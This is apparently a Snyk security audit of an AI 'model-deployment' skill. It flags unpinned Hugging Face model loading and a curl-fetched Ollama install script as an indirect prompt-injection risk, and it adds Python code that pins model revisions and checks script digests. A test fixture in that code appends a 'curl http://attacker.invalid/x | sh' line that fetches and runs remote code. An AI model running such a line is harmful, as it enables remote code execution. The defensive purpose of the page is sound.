model-deployment
Warn
Audited by Snyk on Mar 1, 2026
Risk Level: MEDIUM
Full Analysis
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.80). The skill downloads and loads pretrained models and remote install scripts from public sources at runtime: AutoModelForCausalLM.from_pretrained and AutoTokenizer.from_pretrained in scripts/inference_server.py pull model and tokenizer files from Hugging Face, and the Dockerfile in SKILL.md fetches the Ollama install script with curl https://ollama.ai/install.sh. Because neither the model repository nor the script is pinned to an immutable revision or checked against a known digest, untrusted third-party content is ingested as-is and directly shapes generated outputs and runtime behavior, which enables indirect prompt injection.
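The two patterns the finding names (a from_pretrained call with no pinned revision, and a remote install script fetched at build time) each have a standard mitigation: pin the model to a Hugging Face commit SHA with trust_remote_code=False, and download the script to a file and verify its SHA-256 before executing it instead of piping curl straight into a shell. The following is an added example of both checks; it is not code from the audited skill. The model ids, the lock-file entries and the placeholder commit SHA are constructed for illustration, and the sample script and its digest are built inline so the example runs offline.

```python
"""Pinned model loading and verify-before-execute for remote install scripts.

Added example, not code from the audited skill or from Snyk. MODEL_LOCK,
its commit SHAs and the sample script below are constructed placeholders.
"""
import hashlib
import hmac
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed lock file: model id -> immutable Hugging Face commit SHA.
# "main" (the transformers default) is NOT a pin: whoever controls the repo
# can move it to different weights, tokenizer files or custom model code.
MODEL_LOCK = {
    "example-org/pinned-model": "0123456789abcdef0123456789abcdef01234567",  # placeholder SHA
    "example-org/unpinned-model": "main",  # deliberately wrong entry, rejected below
}
_COMMIT_SHA = re.compile(r"^[0-9a-f]{40}$")


class UnpinnedModelError(ValueError):
    """Raised when a model would be loaded from a mutable or unknown source."""


def pinned_load_kwargs(model_id: str) -> dict:
    """Keyword arguments that make from_pretrained reproducible and inert.

    revision= pins the exact commit; trust_remote_code=False refuses to import
    and execute Python shipped inside the model repository.
    """
    revision = MODEL_LOCK.get(model_id)
    if revision is None:
        raise UnpinnedModelError(f"{model_id!r} is not in the model lock file")
    if not _COMMIT_SHA.match(revision):
        raise UnpinnedModelError(f"{model_id!r} is pinned to {revision!r}, not a commit SHA")
    return {"revision": revision, "trust_remote_code": False}


def is_pinned(model_id: str) -> bool:
    """True if the lock file allows loading this model."""
    try:
        pinned_load_kwargs(model_id)
        return True
    except UnpinnedModelError:
        return False


def load_pinned(model_id: str):
    """Load tokenizer and model with the pinned kwargs (requires transformers)."""
    from transformers import AutoModelForCausalLM, AutoTokenizer  # imported lazily
    kwargs = pinned_load_kwargs(model_id)
    tokenizer = AutoTokenizer.from_pretrained(model_id, **kwargs)
    model = AutoModelForCausalLM.from_pretrained(model_id, **kwargs)
    return tokenizer, model


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_script(script: bytes, expected_sha256: str) -> bool:
    """Compare a downloaded install script against a digest pinned in the build."""
    return hmac.compare_digest(sha256_of(script), expected_sha256.lower())


def run_verified_script(path: Path, expected_sha256: str) -> int:
    """Replacement for `curl URL | sh`: the script is fetched to a file first and
    executed only if its digest matches. Returns the script's exit status.

    The Dockerfile equivalent of this check is:
      RUN curl -fsSL https://ollama.ai/install.sh -o /tmp/install.sh \
       && echo "<pinned sha256>  /tmp/install.sh" | sha256sum -c - \
       && sh /tmp/install.sh
    """
    if not verify_script(path.read_bytes(), expected_sha256):
        raise RuntimeError(f"{path}: SHA-256 mismatch, refusing to execute")
    return subprocess.run(["sh", str(path)], check=False).returncode


# Constructed stand-in for a downloaded install script and the digest that a
# build would pin after reviewing that exact version.
SAMPLE_SCRIPT = b"#!/bin/sh\necho 'installing (sample)'\nexit 0\n"
SAMPLE_SCRIPT_SHA256 = sha256_of(SAMPLE_SCRIPT)
TAMPERED_SCRIPT = SAMPLE_SCRIPT + b"curl http://attacker.invalid/x | sh\n"


if __name__ == "__main__":
    print(pinned_load_kwargs("example-org/pinned-model"))
    print("unpinned-model allowed:", is_pinned("example-org/unpinned-model"))
    with tempfile.TemporaryDirectory() as tmp:
        script = Path(tmp) / "install.sh"
        script.write_bytes(SAMPLE_SCRIPT)
        print("verified script exit status:", run_verified_script(script, SAMPLE_SCRIPT_SHA256))
        script.write_bytes(TAMPERED_SCRIPT)
        try:
            run_verified_script(script, SAMPLE_SCRIPT_SHA256)
        except RuntimeError as exc:
            print("blocked:", exc)
```

Pinning the revision only guarantees you load the files you reviewed; it does not make the weights themselves trustworthy, so content from the model still has to be treated as untrusted input by whatever consumes the generated text.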
Audit Metadata